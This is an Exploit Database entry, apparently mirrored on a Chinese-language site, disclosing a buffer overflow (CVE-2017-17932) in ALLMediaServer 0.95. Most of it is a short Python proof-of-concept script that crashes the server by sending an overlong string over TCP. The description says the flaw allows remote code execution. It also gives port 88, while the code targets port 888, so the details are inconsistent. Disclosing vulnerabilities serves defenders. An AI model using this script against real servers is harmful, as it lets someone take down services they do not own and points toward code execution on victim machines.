ALLMediaServer 0.95 – Buffer Overflow (PoC)

• Exploit Database
• 12 阅读

• 作者： Aloyce J. Makalanga
  日期： 2017-12-27
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43406/

• # Exploit Title: Bufferoverflow in ALLPlayer ALLMediaServer 0.95 and earlier
  # CVE: CVE-2017-17932
  # Date: 27-12-2017 
  # Exploit Author: Aloyce J. Makalanga
  # Contact: https://twitter.com/aloycemjr
  # Vendor Homepage: http://www.allmediaserver.org/
  # Category: webapps
  # Attack Type: Remote
  # Impact: Code execution and/or Denial of Service 
  
  
  
   
  #1. Description
  #
  #A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
  #
  # 
  #2. Proof of Concept
  #
   
  
  #!/usr/bin/python
  
  #NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work. 
  
  def main():
  
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  
   s.connect(('192.168.205.131', 888))
  
   buffer = "A" * 3000
  
  
   s.send(buffer)
  
   s.close()
  
  
  if __name__ == '__main__':
   import socket
  
   main()